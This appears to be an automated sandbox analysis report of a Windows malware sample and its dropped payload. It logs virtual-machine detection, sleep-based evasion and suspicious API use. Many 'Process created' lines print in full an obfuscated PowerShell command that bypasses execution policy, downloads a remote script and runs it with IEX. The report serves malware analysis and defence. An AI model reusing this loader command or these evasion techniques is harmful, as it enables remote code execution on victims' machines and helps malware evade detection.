            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeMemory allocated: 2545CE20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeMemory allocated: 25476840000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 599563Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 599203Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 599094Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 598969Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 598859Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 598750Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 598641Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 598531Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 598422Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 598313Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 598188Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 598078Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 597969Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4183Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5678Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWindow / User API: threadDelayed 3233Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWindow / User API: threadDelayed 353Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076Thread sleep count: 4183 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076Thread sleep count: 5678 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184Thread sleep time: -13835058055282155s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7188Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -599891s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -599672s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -599563s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -599438s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -599313s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -599203s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -599094s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -598969s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -598859s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -598750s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -598641s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -598531s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -598422s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -598313s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -598188s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -598078s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -597969s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 3684Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 6644Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 599563Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 599203Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 599094Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 598969Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 598859Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 598750Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 598641Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 598531Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 598422Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 598313Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 598188Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 598078Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 597969Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545EC7C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Video2n
            Source: WDSecureUtilities_548.exe, 0000000A.00000002.1524954330.0000025476F39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
            Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545EC7C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
            Source: DBp7mBJwqD.exeBinary or memory string: jdk.graal.compiler.hotspot.HotSpotGraalJVMCIServiceLocator
            Source: DBp7mBJwqD.exeBinary or memory string: com.oracle.svm.enterprise.virtualization.vmm.qemu
            Source: DBp7mBJwqD.exeBinary or memory string: :jdk.graal.compiler.hotspot.HotSpotGraalJVMCIServiceLocator
            Source: DBp7mBJwqD.exeBinary or memory string: 1com.oracle.svm.enterprise.virtualization.vmm.qemu
            Source: DBp7mBJwqD.exeBinary or memory string: ,jdk.vm.ci.hotspot.HotSpotJVMCIBackendFactory
            Source: DBp7mBJwqD.exeBinary or memory string: 3com.oracle.svm.enterprise.virtualization.vmm.qemu.c
            Source: DBp7mBJwqD.exeBinary or memory string: VirtualMachineError.java
            Source: DBp7mBJwqD.exeBinary or memory string: 3com.oracle.svm.enterprise.virtualization.vmm.qemu.b
            Source: DBp7mBJwqD.exeBinary or memory string: jdk.vm.ci.services.JVMCIServiceLocator
            Source: DBp7mBJwqD.exeBinary or memory string: java.lang.VirtualMachineError
            Source: DBp7mBJwqD.exeBinary or memory string: &jdk.vm.ci.services.JVMCIServiceLocator
            Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545EC7C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Video
            Source: powershell.exe, 00000008.00000002.1621057399.000001926DF2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: DBp7mBJwqD.exeBinary or memory string: Native image does not support the following JVMCI CPU features: !
            Source: DBp7mBJwqD.exeBinary or memory string: java.lang.VirtualMachineErrorS
            Source: DBp7mBJwqD.exeBinary or memory string: 1com.oracle.svm.enterprise.virtualization.vmm.qemu#
            Source: DBp7mBJwqD.exeBinary or memory string: 23.0.1+11-jvmci-b01
            Source: DBp7mBJwqD.exeBinary or memory string: 23.0.1+11-jvmci-b01W
            Source: DBp7mBJwqD.exeBinary or memory string: @Native image does not support the following JVMCI CPU features: !
            Source: DBp7mBJwqD.exeBinary or memory string: jdk.vm.ci.hotspot.HotSpotJVMCIBackendFactory
            Source: DBp7mBJwqD.exeBinary or memory string: com.oracle.svm.enterprise.virtualization.vmm.qemu.b
            Source: DBp7mBJwqD.exe, 00000000.00000002.1327849631.00000290E9467000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]]~+P
            Source: DBp7mBJwqD.exeBinary or memory string: com.oracle.svm.enterprise.virtualization.vmm.qemu.c
            Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545EC7C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Virtual
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            .NET source code references suspicious native API functions
            Source: WDSecureUtilities_548.exe.8.dr, Dogacocaguc.csReference to suspicious API methods: Gobutyfybyk.Kernel32.OpenProcess(Gobutyfybyk.Debugezeserocat.DuplicateHandle, bInheritHandle: true, (uint)Ijakuvekygelusumy)
            Source: WDSecureUtilities_548.exe.8.dr, Igijigomenu.csReference to suspicious API methods: LoadLibrary(Gyxemurinazulovyn)
            Source: WDSecureUtilities_548.exe.8.dr, Igijigomenu.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(intPtr, Nemalapisiputotup), typeof(T))
            Bypasses PowerShell execution policy
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
            Source: C:\Users\user\Desktop\DBp7mBJwqD.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script""Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe "C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe" -pkek -aoa -y Jump to behavior
            Source: C:\Users\user\Desktop\DBp7mBJwqD.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c "cmd.exe /c start /min cmd /c powershell -nop -noni -executionpolicy bypass -command "$ai='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$ai+$mode+$update+$dev+$beta; $useragent='tradingview'; $response=invoke-webrequest -uri $charts -usebasicparsing -useragent $useragent; $script=[system.text.encoding]::utf8.getstring($response.content); iex $script""
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start /min cmd /c powershell -nop -noni -executionpolicy bypass -command "$ai='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$ai+$mode+$update+$dev+$beta; $useragent='tradingview'; $response=invoke-webrequest -uri $charts -usebasicparsing -useragent $useragent; $script=[system.text.encoding]::utf8.getstring($response.content); iex $script"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c powershell -nop -noni -executionpolicy bypass -command "$ai='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$ai+$mode+$update+$dev+$beta; $useragent='tradingview'; $response=invoke-webrequest -uri $charts -usebasicparsing -useragent $useragent; $script=[system.text.encoding]::utf8.getstring($response.content); iex $script"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -noni -executionpolicy bypass -command "$ai='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$ai+$mode+$update+$dev+$beta; $useragent='tradingview'; $response=invoke-webrequest -uri $charts -usebasicparsing -useragent $useragent; $script=[system.text.encoding]::utf8.getstring($response.content); iex $script"
            Source: C:\Users\user\Desktop\DBp7mBJwqD.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c "cmd.exe /c start /min cmd /c powershell -nop -noni -executionpolicy bypass -command "$ai='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$ai+$mode+$update+$dev+$beta; $useragent='tradingview'; $response=invoke-webrequest -uri $charts -usebasicparsing -useragent $useragent; $script=[system.text.encoding]::utf8.getstring($response.content); iex $script""Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start /min cmd /c powershell -nop -noni -executionpolicy bypass -command "$ai='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$ai+$mode+$update+$dev+$beta; $useragent='tradingview'; $response=invoke-webrequest -uri $charts -usebasicparsing -useragent $useragent; $script=[system.text.encoding]::utf8.getstring($response.content); iex $script"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c powershell -nop -noni -executionpolicy bypass -command "$ai='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$ai+$mode+$update+$dev+$beta; $useragent='tradingview'; $response=invoke-webrequest -uri $charts -usebasicparsing -useragent $useragent; $script=[system.text.encoding]::utf8.getstring($response.content); iex $script"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -noni -executionpolicy bypass -command "$ai='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$ai+$mode+$update+$dev+$beta; $useragent='tradingview'; $response=invoke-webrequest -uri $charts -usebasicparsing -useragent $useragent; $script=[system.text.encoding]::utf8.getstring($response.content); iex $script"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
